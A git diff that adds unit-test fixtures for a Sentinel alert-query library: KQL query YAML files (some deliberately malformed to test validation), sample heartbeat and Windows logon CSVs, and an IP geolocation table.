+++ b/tests/testdata/data_q_hierarchy.yaml
@@ -0,0 +1,99 @@
+metadata:
+  version: 1
+  description: Kql Sentinel Alert Queries
+  data_environments: [LogAnalytics]
+  data_families: [SecurityAlert, Alerts]
+  tags: ['alert', 'securityalert']
+defaults:
+  metadata:
+    data_source: 'security_alert'
+    data_families: [Alerts.type3]
+  parameters:
+      table:
+        description: Table name
+        type: str
+        default: 'SecurityAlert'
+      query_project:
+        description: Column project statement
+        type: str
+        default: '
+          | project-rename StartTimeUtc = StartTime, EndTimeUtc = EndTime,
+          AlertDisplayName = DisplayName, Severity = AlertSeverity
+          | extend AlertType = iif(isempty(AlertType), AlertName, AlertType)'
+      start:
+        description: Query start time
+        type: datetime
+      end:
+        description: Query end time
+        type: datetime
+      add_query_items:
+        description: Additional query clauses
+        type: str
+        default: ''
+      subscription_filter:
+        description: Optional subscription/tenant filter expression
+        type: str
+        default: 'true'
+      path_separator:
+        description: Path separator
+        type: str
+        default: '\\'
+sources:
+  query1:
+    description: Retrieves list of alerts
+    metadata:
+      data_families: [Alerts.type1]
+    args:
+      query: '
+        {table}
+        {query_project}
+        | where {subscription_filter}
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | extend extendedProps = parse_json(ExtendedProperties)
+        | extend CompromisedEntity = tostring(extendedProps["Compromised Host"])
+        | project-away extendedProps
+        {add_query_items}'
+      uri: None
+    parameters:
+  query2:
+    description: Retrieves summary count of alerts by type
+    metadata:
+      data_families: [Alerts.type2]
+    args:
+      query: '
+        {table}
+        {query_project}
+        | where {subscription_filter}
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | summarize alertCount=count(), firstAlert=min(TimeGenerated),
+            lastAlert=max(TimeGenerated) by AlertName
+        | order by alertCount desc
+        {add_query_items}'
+    parameters:
+  query3:
+    description: Retrieves a single alert by SystemAlertId
+    metadata:
+    args:
+      query: '
+        {table}
+        {query_project}
+        | where {subscription_filter}
+        | extend extendedProps = parse_json(ExtendedProperties)
+        | extend CompromisedEntity = tostring(extendedProps["Compromised Host"])
+        | project-away extendedProps
+        | where SystemAlertId == "{system_alert_id}"
+        {add_query_items}'
+    parameters:
+      system_alert_id:
+        description: 'The ID of the alert'
+        type: str
+      start:
+        description: Query start time
+        type: datetime
+        default: 0  # fake default to prevent this being viewed as required
+      end:
+        description: Query end time
+        type: datetime
+        default: 0  # fake default to prevent this being viewed as required
diff --git a/tests/testdata/data_q_meta_fail.yaml b/tests/testdata/data_q_meta_fail.yaml
new file mode 100644
index 000000000..2382e83e1
--- /dev/null
+++ b/tests/testdata/data_q_meta_fail.yaml
@@ -0,0 +1,212 @@
+metadata:
+  version: 1
+  description: Kql Sentinel Alert Queries
+  data_environments: [LogAnalytics]
+  tags: ['alert', 'securityalert']
+defaults:
+  metadata:
+    data_source: 'security_alert'
+  parameters:
+      table:
+        description: Table name
+        type: str
+        default: 'SecurityAlert'
+      query_project:
+        description: Column project statement
+        type: str
+        default: '
+          | project-rename StartTimeUtc = StartTime, EndTimeUtc = EndTime,
+          AlertDisplayName = DisplayName, Severity = AlertSeverity
+          | extend AlertType = iif(isempty(AlertType), AlertName, AlertType)'
+      start:
+        description: Query start time
+        type: datetime
+      end:
+        description: Query end time
+        type: datetime
+      add_query_items:
+        description: Additional query clauses
+        type: str
+        default: ''
+      subscription_filter:
+        description: Optional subscription/tenant filter expression
+        type: str
+        default: 'true'
+      path_separator:
+        description: Path separator
+        type: str
+        default: '\\'
+sources:
+  list_alerts:
+    description: Retrieves list of alerts
+    metadata:
+    args:
+      query: '
+        {table}
+        {query_project}
+        | where {subscription_filter}
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | extend extendedProps = parse_json(ExtendedProperties)
+        | extend CompromisedEntity = tostring(extendedProps["Compromised Host"])
+        | project-away extendedProps
+        {add_query_items}'
+      uri: None
+    parameters:
+  list_alerts_counts:
+    description: Retrieves summary count of alerts by type
+    metadata:
+    args:
+      query: '
+        {table}
+        {query_project}
+        | where {subscription_filter}
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | summarize alertCount=count(), firstAlert=min(TimeGenerated),
+            lastAlert=max(TimeGenerated) by AlertName
+        | order by alertCount desc
+        {add_query_items}'
+    parameters:
+  get_alert:
+    description: Retrieves a single alert by SystemAlertId
+    metadata:
+    args:
+      query: '
+        {table}
+        {query_project}
+        | where {subscription_filter}
+        | extend extendedProps = parse_json(ExtendedProperties)
+        | extend CompromisedEntity = tostring(extendedProps["Compromised Host"])
+        | project-away extendedProps
+        | where SystemAlertId == "{system_alert_id}"
+        {add_query_items}'
+    parameters:
+      system_alert_id:
+        description: 'The ID of the alert'
+        type: str
+      start:
+        description: Query start time
+        type: datetime
+        default: 0  # fake default to prevent this being viewed as required
+      end:
+        description: Query end time
+        type: datetime
+        default: 0  # fake default to prevent this being viewed as required
+  list_related_alerts:
+    description: Retrieves list of alerts with a common host, acount or process
+    metadata:
+    args:
+      query: '
+        let src_host = "{host_name}";
+        let src_acct = "{account_name}";
+        let src_proc = "{process_name}";
+        {table}
+        {query_project}
+        | where {subscription_filter}
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | extend Computer = src_host
+        | extend src_hostname = tostring(split(src_host, ".")[0])
+        | extend src_accountname = iif(src_acct contains "\\\\",
+                                      tostring(split(src_acct, "\\\\")[-1]),
+                                      tostring(split(src_acct, "@")[0]))
+        | extend src_procname = tostring(split(src_proc, "{path_separator}")[-1])
+        | extend host_match = iif(isnotempty(src_host) and
+            (Entities has src_hostname or Entities has src_host
+            or ExtendedProperties has src_hostname
+            or ExtendedProperties has src_host), true, false)
+        | extend acct_match = iif(isnotempty(src_acct)
+            and (Entities has src_accountname or Entities has src_acct
+            or ExtendedProperties has src_accountname
+            or ExtendedProperties has src_acct), true, false)
+        | extend proc_match = iif(isnotempty(src_acct)
+            and (Entities has src_procname or Entities has src_proc
+            or ExtendedProperties has src_procname
+            or ExtendedProperties has src_proc), true, false)
+        | where host_match or acct_match or proc_match
+        {add_query_items}'
+    parameters:
+      host_name:
+        description: The hostname to find
+        type: str
+      account_name:
+        description: The account name to find
+        type: str
+        default: ''
+      process_name:
+        description: The process name to find
+        type: str
+        default: ''
+  list_alerts_for_ip:
+    description: Retrieves list of alerts with a common IP Address
+    metadata:
+    args:
+      query: '
+        let src_ips = "{source_ip_list}";
+        let src_ips_arr = split(src_ips, ",");
+        let IP_table = toscalar(range idx from 0 to array_length(src_ips_arr) - 1 step 1
+        | extend ip = trim(@"\\s*", tostring(src_ips_arr[idx]))
+        | project ip
+        | distinct ip
+        | summarize makeset(ip) );
+        let ip_extract = materialize(
+        {table}
+        {query_project}
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | project SystemAlertId, ExtendedProperties, Entities
+        | extend source_ips_str =
+            extract("\\"Source IPs\\": \\"([^\\"]+)\\"", 1, ExtendedProperties)
+        | extend source_ips_1 =
+            iif(isnotempty(source_ips_str), split(source_ips_str, ","), dynamic([]))
+        | extend source_ips_2 =
+            extract_all("\\"Address\\": \\"([^\\"]+)\\"", dynamic([1]), Entities)
+        | mvexpand alert_ip_1 =
+            source_ips_1 to typeof(string), alert_ip_2 = source_ips_2 to typeof(string)
+        | where isnotempty(alert_ip_1) or isnotempty(alert_ip_2)
+        | where alert_ip_1 in (IP_table) or alert_ip_2 in (IP_table)
+        | extend matching_ips = case(isnotempty(alert_ip_1) and isnotempty(alert_ip_2),
+                                        strcat(alert_ip_1, ",", alert_ip_2),
+                                    isnotempty(alert_ip_1), alert_ip_1,
+                                    isnotempty(alert_ip_2), alert_ip_2,
+                                    "")
+        | extend MatchingIps = split(matching_ips, ",")
+        | project-away source_ips_str, source_ips_1, source_ips_2,
+            alert_ip_1, alert_ip_2, matching_ips
+        );
+        {table}
+        {query_project}
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | join (ip_extract) on SystemAlertId
+        {add_query_items}'
+    parameters:
+      table:
+        description: Table name
+        type: str
+        default: 'SecurityAlert'
+      query_project:
+        description: Column project statement
+        type: str
+        default: '
+          | project-rename StartTimeUtc = StartTime, EndTimeUtc = EndTime,
+          AlertDisplayName = DisplayName, Severity = AlertSeverity
+          | extend AlertType = iif(isempty(AlertType), AlertName, AlertType)'
+      start:
+        description: Query start time
+        type: datetime
+      end:
+        description: Query end time
+        type: datetime
+      path_separator:
+        description: Path separator
+        type: str
+        default: '\\'
+      add_query_items:
+        description: Additional query clauses
+        type: str
+        default: ''
+      source_ip_list:
+        description: List of one or more IPs to match
+        type: str
\ No newline at end of file
diff --git a/tests/testdata/data_q_source_fail_param.yaml b/tests/testdata/data_q_source_fail_param.yaml
new file mode 100644
index 000000000..a3163d74d
--- /dev/null
+++ b/tests/testdata/data_q_source_fail_param.yaml
@@ -0,0 +1,56 @@
+metadata:
+  version: 1
+  description: Kql Sentinel Alert Queries
+  data_environments: [LogAnalytics]
+  data_families: [SecurityAlert]
+  tags: ['alert', 'securityalert']
+defaults:
+  metadata:
+    data_source: 'security_alert'
+  parameters:
+      table:
+        description: Table name
+        type: str
+        default: 'SecurityAlert'
+      query_project:
+        description: Column project statement
+        type: str
+        default: '
+          | project-rename StartTimeUtc = StartTime, EndTimeUtc = EndTime,
+          AlertDisplayName = DisplayName, Severity = AlertSeverity
+          | extend AlertType = iif(isempty(AlertType), AlertName, AlertType)'
+      start:
+        description: Query start time
+        type: datetime
+      end:
+        description: Query end time
+        type: datetime
+      add_query_items:
+        description: Additional query clauses
+        type: str
+        default: ''
+      subscription_filter:
+        description: Optional subscription/tenant filter expression
+        type: str
+        default: 'true'
+      path_separator:
+        description: Path separator
+        type: str
+        default: '\\'
+sources:
+  missing_param_source:
+    description: Retrieves list of alerts
+    metadata:
+    args:
+      query: '
+        {table}
+        {foo}
+        | where {subscription_filter}
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | extend extendedProps = parse_json(ExtendedProperties)
+        | extend CompromisedEntity = tostring(extendedProps["Compromised Host"])
+        | project-away extendedProps
+        {add_query_items}'
+      uri: None
+    parameters:
\ No newline at end of file
diff --git a/tests/testdata/data_q_source_fail_type.yaml b/tests/testdata/data_q_source_fail_type.yaml
new file mode 100644
index 000000000..f8fd9f185
--- /dev/null
+++ b/tests/testdata/data_q_source_fail_type.yaml
@@ -0,0 +1,58 @@
+metadata:
+  version: 1
+  description: Kql Sentinel Alert Queries
+  data_environments: [LogAnalytics]
+  data_families: [SecurityAlert]
+  tags: ['alert', 'securityalert']
+defaults:
+  metadata:
+    data_source: 'security_alert'
+  parameters:
+      table:
+        description: Table name
+        type: str
+        default: 'SecurityAlert'
+      query_project:
+        description: Column project statement
+        type: str
+        default: '
+          | project-rename StartTimeUtc = StartTime, EndTimeUtc = EndTime,
+          AlertDisplayName = DisplayName, Severity = AlertSeverity
+          | extend AlertType = iif(isempty(AlertType), AlertName, AlertType)'
+      start:
+        description: Query start time
+        type: datetime
+      end:
+        description: Query end time
+        type: datetime
+      add_query_items:
+        description: Additional query clauses
+        type: str
+        default: ''
+      subscription_filter:
+        description: Optional subscription/tenant filter expression
+        type: str
+        default: 'true'
+      path_separator:
+        description: Path separator
+        type: str
+        default: '\\'
+sources:
+  missing_type:
+    description: Retrieves summary count of alerts by type
+    metadata:
+    args:
+      query: '
+        {table}
+        {query_project}
+        | where {subscription_filter}
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | summarize alertCount=count(), firstAlert=min(TimeGenerated),
+            lastAlert=max(TimeGenerated) by AlertName
+        | order by alertCount desc
+        | where Computer = {host_name}
+        {add_query_items}'
+    parameters:
+      host_name:
+        description: Host name
diff --git a/tests/testdata/data_q_success.yaml b/tests/testdata/data_q_success.yaml
new file mode 100644
index 000000000..1b7e4104a
--- /dev/null
+++ b/tests/testdata/data_q_success.yaml
@@ -0,0 +1,97 @@
+metadata:
+  version: 1
+  description: Kql Sentinel Alert Queries
+  data_environments: [LogAnalytics]
+  data_families: [SecurityAlert]
+  tags: ['alert', 'securityalert']
+defaults:
+  metadata:
+    data_source: 'security_alert'
+  parameters:
+      table:
+        description: Table name
+        type: str
+        default: 'SecurityAlert'
+      query_project:
+        description: Column project statement
+        type: str
+        default: '
+          | project-rename StartTimeUtc = StartTime, EndTimeUtc = EndTime,
+          AlertDisplayName = DisplayName, Severity = AlertSeverity
+          | extend AlertType = iif(isempty(AlertType), AlertName, AlertType)'
+      start:
+        description: Query start time
+        type: datetime
+      end:
+        description: Query end time
+        type: datetime
+      add_query_items:
+        description: Additional query clauses
+        type: str
+        default: ''
+      subscription_filter:
+        description: Optional subscription/tenant filter expression
+        type: str
+        default: 'true'
+      path_separator:
+        description: Path separator
+        type: str
+        default: '\\'
+sources:
+  query1:
+    description: Retrieves list of alerts
+    metadata:
+    args:
+      query: '
+        {table}
+        {query_project}
+        | where {subscription_filter}
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | extend extendedProps = parse_json(ExtendedProperties)
+        | extend CompromisedEntity = tostring(extendedProps["Compromised Host"])
+        | project-away extendedProps
+        {add_query_items}'
+      uri: None
+    parameters:
+  query2:
+    description: Retrieves summary count of alerts by type
+    metadata:
+    args:
+      query: '
+        {table}
+        {query_project}
+        | where {subscription_filter}
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | summarize alertCount=count(), firstAlert=min(TimeGenerated),
+            lastAlert=max(TimeGenerated) by AlertName
+        | order by alertCount desc
+        {add_query_items}'
+    parameters:
+  query3:
+    description: Retrieves a single alert by SystemAlertId
+    metadata:
+    args:
+      query: '
+        {table}
+        {query_project}
+        | where {subscription_filter}
+        | extend extendedProps = parse_json(ExtendedProperties)
+        | extend CompromisedEntity = tostring(extendedProps["Compromised Host"])
+        | project-away extendedProps
+        | where SystemAlertId == "{system_alert_id}"
+        {add_query_items}'
+    parameters:
+      system_alert_id:
+        description: 'The ID of the alert'
+        type: str
+      start:
+        description: Query start time
+        type: datetime
+        default: 0  # fake default to prevent this being viewed as required
+      end:
+        description: Query end time
+        type: datetime
+        default: 0  # fake default to prevent this being viewed as required
+  
\ No newline at end of file
diff --git a/tests/testdata/geolite/GeoLite2-City.mmdb b/tests/testdata/geolite/GeoLite2-City.mmdb
new file mode 100644
index 000000000..5504d53f0
Binary files /dev/null and b/tests/testdata/geolite/GeoLite2-City.mmdb differ
diff --git a/tests/testdata/host_hb.csv b/tests/testdata/host_hb.csv
new file mode 100644
index 000000000..38f4c9a83
--- /dev/null
+++ b/tests/testdata/host_hb.csv
@@ -0,0 +1,2 @@
+,TenantId,SourceSystem,TimeGenerated,MG,ManagementGroupName,SourceComputerId,ComputerIP,Computer,Category,OSType,OSName,OSMajorVersion,OSMinorVersion,Version,SCAgentChannel,IsGatewayInstalled,RemoteIPLongitude,RemoteIPLatitude,RemoteIPCountry,SubscriptionId,ResourceGroup,ResourceProvider,Resource,ResourceId,ResourceType,ComputerEnvironment,Solutions,VMUUID,Type,_ResourceId
+0,b1315f05-4a7a-45b4-811f-73e715f7c122,OpsManager,2019-07-08 20:07:48,00000000-0000-0000-0000-000000000002,,2d39a7ab-bcb7-4384-9b9a-a1bf873434b3,51.140.160.102,squid-uk-02,Direct Agent,Linux,Ubuntu,18,04,1.11.0-7,Direct,,-0.13,51.5,United Kingdom,3b701f84-d04b-4479-89b1-fa8827eb537e,proxy,Microsoft.Compute,squid-uk-02,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourceGroups/proxy/providers/Microsoft.Compute/virtualMachines/squid-uk-02,virtualMachines,Azure,"""security"", ""networkMonitoring"", ""securityCenterFree"", ""securityInsights""",4acad4ff-aab2-934f-8b1f-2cadd5f23681,Heartbeat,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
diff --git a/tests/testdata/host_logons.csv b/tests/testdata/host_logons.csv
new file mode 100644
index 000000000..077e11c8e
--- /dev/null
+++ b/tests/testdata/host_logons.csv
@@ -0,0 +1,15 @@
+,TenantId,Account,EventID,TimeGenerated,SourceComputerId,Computer,SubjectUserName,SubjectDomainName,SubjectUserSid,TargetUserName,TargetDomainName,TargetUserSid,TargetLogonId,LogonProcessName,LogonType,AuthenticationPackageName,Status,IpAddress,WorkstationName
+0,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4624,2019-01-15 05:15:02.980,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICAlertsWin1,MSTICAlertsWin1$,WORKGROUP,S-1-5-18,MSTICAdmin,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,0xfaac27,Advapi  ,4,Negotiate,,-,MSTICAlertsWin1
+1,802d39e1-9d70-404d-832c-2de5e2478eda,NT AUTHORITY\SYSTEM,4624,2019-01-15 05:15:04.503,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICAlertsWin1,MSTICAlertsWin1$,WORKGROUP,S-1-5-18,SYSTEM,NT AUTHORITY,S-1-5-18,0x3e7,Advapi  ,5,Negotiate,,-,-
+2,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\adm1nistrator,4624,2019-01-15 05:15:06.363,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICAlertsWin1,-,-,S-1-0-0,adm1nistrator,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-1066,0xfb5ee6,NtLmSsp ,3,NTLM,,fe80::38dc:e4a9:61bd:b458,MSTICAlertsWin1
+3,802d39e1-9d70-404d-832c-2de5e2478eda,NT AUTHORITY\SYSTEM,4624,2019-01-15 05:15:10.813,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICAlertsWin1,MSTICAlertsWin1$,WORKGROUP,S-1-5-18,SYSTEM,NT AUTHORITY,S-1-5-18,0x3e7,Advapi  ,5,Negotiate,,-,-
+4,802d39e1-9d70-404d-832c-2de5e2478eda,NT AUTHORITY\SYSTEM,4624,2019-01-15 05:15:14.453,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICAlertsWin1,MSTICAlertsWin1$,WORKGROUP,S-1-5-18,SYSTEM,NT AUTHORITY,S-1-5-18,0x3e7,Advapi  ,5,Negotiate,,-,-
+5,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4624,2019-01-15 04:28:33.090,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICAlertsWin1,MSTICAlertsWin1$,WORKGROUP,S-1-5-18,MSTICAdmin,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,0xf0c9d6,Advapi  ,4,Negotiate,,-,MSTICAlertsWin1
+6,802d39e1-9d70-404d-832c-2de5e2478eda,NT AUTHORITY\SYSTEM,4624,2019-01-15 03:21:49.617,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICAlertsWin1,MSTICAlertsWin1$,WORKGROUP,S-1-5-18,SYSTEM,NT AUTHORITY,S-1-5-18,0x3e7,Advapi  ,5,Negotiate,,-,-
+7,802d39e1-9d70-404d-832c-2de5e2478eda,NT AUTHORITY\SYSTEM,4624,2019-01-15 03:21:51.957,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICAlertsWin1,MSTICAlertsWin1$,WORKGROUP,S-1-5-18,SYSTEM,NT AUTHORITY,S-1-5-18,0x3e7,Advapi  ,5,Negotiate,,-,-
+8,802d39e1-9d70-404d-832c-2de5e2478eda,NT AUTHORITY\SYSTEM,4624,2019-01-15 02:45:49.393,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICAlertsWin1,MSTICAlertsWin1$,WORKGROUP,S-1-5-18,SYSTEM,NT AUTHORITY,S-1-5-18,0x3e7,Advapi  ,5,Negotiate,,-,-
+9,802d39e1-9d70-404d-832c-2de5e2478eda,NT AUTHORITY\SYSTEM,4624,2019-01-15 02:45:51.727,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICAlertsWin1,MSTICAlertsWin1$,WORKGROUP,S-1-5-18,SYSTEM,NT AUTHORITY,S-1-5-18,0x3e7,Advapi  ,5,Negotiate,,-,-
+10,802d39e1-9d70-404d-832c-2de5e2478eda,NT AUTHORITY\SYSTEM,4624,2019-01-15 01:42:28.340,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICAlertsWin1,MSTICAlertsWin1$,WORKGROUP,S-1-5-18,SYSTEM,NT AUTHORITY,S-1-5-18,0x3e7,Advapi  ,5,Negotiate,,-,-
+11,802d39e1-9d70-404d-832c-2de5e2478eda,NT AUTHORITY\SYSTEM,4624,2019-01-15 01:45:23.610,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICAlertsWin1,MSTICAlertsWin1$,WORKGROUP,S-1-5-18,SYSTEM,NT AUTHORITY,S-1-5-18,0x3e7,Advapi  ,5,Negotiate,,-,-
+12,802d39e1-9d70-404d-832c-2de5e2478eda,NT AUTHORITY\SYSTEM,4624,2019-01-15 03:09:49.353,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICAlertsWin1,MSTICAlertsWin1$,WORKGROUP,S-1-5-18,SYSTEM,NT AUTHORITY,S-1-5-18,0x3e7,Advapi  ,5,Negotiate,,-,-
+13,802d39e1-9d70-404d-832c-2de5e2478eda,NT AUTHORITY\SYSTEM,4624,2019-01-15 03:09:51.707,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICAlertsWin1,MSTICAlertsWin1$,WORKGROUP,S-1-5-18,SYSTEM,NT AUTHORITY,S-1-5-18,0x3e7,Advapi  ,5,Negotiate,,-,-
diff --git a/tests/testdata/ip_entities.pkl b/tests/testdata/ip_entities.pkl
new file mode 100644
index 000000000..36d6f01c8
Binary files /dev/null and b/tests/testdata/ip_entities.pkl differ
diff --git a/tests/testdata/ip_locs.csv b/tests/testdata/ip_locs.csv
new file mode 100644
index 000000000..bf1767b70
--- /dev/null
+++ b/tests/testdata/ip_locs.csv
@@ -0,0 +1,86 @@
+,AllExtIPs,AdditionalData,Type,CountryCode,CountryName,State,City,Longitude,Latitude,IpAddress
+0,65.55.44.109,{},geolocation,US,United States,Virginia,Boydton,-78.375,36.6534,65.55.44.109
+1,13.71.172.128,{},geolocation,CA,Canada,Ontario,Toronto,-79.4195,43.6644,13.71.172.128
+2,13.71.172.130,{},geolocation,CA,Canada,Ontario,Toronto,-79.4195,43.6644,13.71.172.130
+3,40.124.45.19,{},geolocation,US,United States,Texas,San Antonio,-98.4935,29.4247,40.124.45.19
+4,104.43.212.12,{},geolocation,US,United States,Iowa,Des Moines,-93.6112,41.6006,104.43.212.12
+5,40.77.232.95,{},geolocation,US,United States,Wyoming,Cheyenne,-104.8193,41.1399,40.77.232.95
+6,13.107.4.50,{},geolocation,US,United States,,,-97.822,37.751,13.107.4.50
+7,40.77.228.69,{},geolocation,US,United States,Virginia,Boydton,-78.375,36.6534,40.77.228.69
+8,172.217.15.99,{},geolocation,US,United States,,,-97.822,37.751,172.217.15.99
+9,40.85.232.64,{},geolocation,CA,Canada,Ontario,Toronto,-79.4195,43.6644,40.85.232.64
+10,20.38.98.100,{},geolocation,US,United States,Virginia,Washington,-78.1539,38.7095,20.38.98.100
+11,23.96.64.84,{},geolocation,US,United States,Virginia,Washington,-78.1539,38.7095,23.96.64.84
+12,65.55.44.108,{},geolocation,US,United States,Virginia,Boydton,-78.375,36.6534,65.55.44.108
+13,131.107.147.209,{},geolocation,US,United States,Washington,Redmond,-122.1243,47.6742,131.107.147.209
+16,13.82.152.48,{},geolocation,US,United States,Virginia,Washington,-78.1539,38.7095,13.82.152.48
+17,8.249.241.254,{},geolocation,US,United States,,,-97.822,37.751,8.249.241.254
+18,40.77.226.250,{},geolocation,IE,Ireland,Leinster,Dublin,-6.2488,53.3338,40.77.226.250
+19,13.65.107.32,{},geolocation,US,United States,Texas,San Antonio,-98.4935,29.4247,13.65.107.32
+20,13.67.143.117,{},geolocation,US,United States,Iowa,Des Moines,-93.6112,41.6006,13.67.143.117
+21,52.165.170.112,{},geolocation,US,United States,Iowa,Des Moines,-93.6112,41.6006,52.165.170.112
+22,52.173.28.179,{},geolocation,US,United States,Iowa,Des Moines,-93.6112,41.6006,52.173.28.179
+23,52.168.138.145,{},geolocation,US,United States,Virginia,Washington,-78.1539,38.7095,52.168.138.145
+24,13.68.93.109,{},geolocation,US,United States,Virginia,Boydton,-78.375,36.6534,13.68.93.109
+25,65.52.108.92,{},geolocation,US,United States,Virginia,Boydton,-78.375,36.6534,65.52.108.92
+26,23.48.36.78,{},geolocation,US,United States,,,-97.822,37.751,23.48.36.78
+27,23.223.3.100,{},geolocation,US,United States,,,-97.822,37.751,23.223.3.100
+28,205.185.216.42,{},geolocation,US,United States,,,-97.822,37.751,205.185.216.42
+29,13.83.149.5,{},geolocation,US,United States,California,San Jose,-121.8914,37.3388,13.83.149.5
+30,13.83.148.235,{},geolocation,US,United States,California,San Jose,-121.8914,37.3388,13.83.148.235
+31,8.253.45.249,{},geolocation,US,United States,,,-97.822,37.751,8.253.45.249
+32,72.21.91.29,{},geolocation,US,United States,,,-97.822,37.751,72.21.91.29
+33,72.21.81.240,{},geolocation,US,United States,,,-97.822,37.751,72.21.81.240
+34,168.62.32.212,{},geolocation,US,United States,Virginia,Washington,-78.1539,38.7095,168.62.32.212
+35,40.121.3.131,{},geolocation,US,United States,Virginia,Washington,-78.1539,38.7095,40.121.3.131
+36,52.239.152.10,{},geolocation,US,United States,Virginia,Washington,-78.1539,38.7095,52.239.152.10
+37,40.87.63.92,{},geolocation,US,United States,Virginia,Washington,-78.1539,38.7095,40.87.63.92
+38,40.80.145.38,{},geolocation,US,United States,Virginia,Washington,-78.1539,38.7095,40.80.145.38
+39,23.47.27.169,{},geolocation,US,United States,,,-97.822,37.751,23.47.27.169
+40,65.55.163.78,{},geolocation,US,United States,Virginia,Washington,-78.1539,38.7095,65.55.163.78
+41,172.217.15.78,{},geolocation,US,United States,,,-97.822,37.751,172.217.15.78
+42,65.55.163.76,{},geolocation,US,United States,Virginia,Washington,-78.1539,38.7095,65.55.163.76
+43,172.217.8.3,{},geolocation,US,United States,,,-97.822,37.751,172.217.8.3
+44,13.74.179.117,{},geolocation,IE,Ireland,Leinster,Dublin,-6.2488,53.3338,13.74.179.117
+45,90.130.70.73,{},geolocation,SE,Sweden,,,18.056,59.3247,90.130.70.73
+46,65.55.252.190,{},geolocation,US,United States,Washington,,-122.3314,47.6092,65.55.252.190
+47,40.69.153.67,{},geolocation,US,United States,Iowa,Des Moines,-93.6112,41.6006,40.69.153.67
+48,99.84.104.63,{},geolocation,US,United States,,,-97.822,37.751,99.84.104.63
+49,157.55.134.136,{},geolocation,US,United States,Virginia,Washington,-78.1539,38.7095,157.55.134.136
+50,72.21.81.200,{},geolocation,US,United States,,,-97.822,37.751,72.21.81.200
+51,204.79.197.200,{},geolocation,US,United States,,,-97.822,37.751,204.79.197.200
+52,99.84.106.178,{},geolocation,US,United States,,,-97.822,37.751,99.84.106.178
+53,23.3.13.106,{},geolocation,US,United States,,,-97.822,37.751,23.3.13.106
+54,99.84.106.27,{},geolocation,US,United States,,,-97.822,37.751,99.84.106.27
+55,23.45.180.234,{},geolocation,US,United States,,,-97.822,37.751,23.45.180.234
+56,99.84.106.92,{},geolocation,US,United States,,,-97.822,37.751,99.84.106.92
+57,23.3.13.146,{},geolocation,US,United States,,,-97.822,37.751,23.3.13.146
+58,23.3.13.112,{},geolocation,US,United States,,,-97.822,37.751,23.3.13.112
+59,13.68.226.108,{},geolocation,US,United States,Virginia,Washington,-78.1539,38.7095,13.68.226.108
+60,212.13.197.231,{},geolocation,GB,United Kingdom,,,-0.1224,51.4964,212.13.197.231
+61,46.43.34.31,{},geolocation,GB,United Kingdom,,,-0.1224,51.4964,46.43.34.31
+62,104.211.30.1,{},geolocation,US,United States,Virginia,Washington,-78.1539,38.7095,104.211.30.1
+63,52.183.114.173,{},geolocation,US,United States,Washington,,-122.3314,47.6092,52.183.114.173
+64,40.79.85.125,{},geolocation,US,United States,Virginia,Boydton,-78.375,36.6534,40.79.85.125
+65,157.55.135.128,{},geolocation,US,United States,Virginia,Washington,-78.1539,38.7095,157.55.135.128
+66,172.217.8.14,{},geolocation,US,United States,,,-97.822,37.751,172.217.8.14
+67,13.89.220.65,{},geolocation,US,United States,Iowa,Des Moines,-93.6112,41.6006,13.89.220.65
+68,23.4.187.27,{},geolocation,US,United States,,,-97.822,37.751,23.4.187.27
+69,52.165.175.144,{},geolocation,US,United States,Iowa,Des Moines,-93.6112,41.6006,52.165.175.144
+70,23.48.36.47,{},geolocation,US,United States,,,-97.822,37.751,23.48.36.47
+71,52.173.26.181,{},geolocation,US,United States,Iowa,Des Moines,-93.6112,41.6006,52.173.26.181
+72,23.45.180.121,{},geolocation,US,United States,,,-97.822,37.751,23.45.180.121
+73,20.42.24.50,{},geolocation,US,United States,Virginia,Washington,-78.1539,38.7095,20.42.24.50
+74,13.64.188.245,{},geolocation,US,United States,California,San Jose,-121.8914,37.3388,13.64.188.245
+75,13.83.148.218,{},geolocation,US,United States,California,San Jose,-121.8914,37.3388,13.83.148.218
+76,65.55.163.80,{},geolocation,US,United States,Virginia,Washington,-78.1539,38.7095,65.55.163.80
+77,134.170.58.123,{},geolocation,US,United States,Iowa,Des Moines,-93.6112,41.6006,134.170.58.123
+78,173.194.61.40,{},geolocation,US,United States,,,-97.822,37.751,173.194.61.40
+79,216.58.218.238,{},geolocation,US,United States,Utah,Bluffdale,-111.9439,40.4953,216.58.218.238
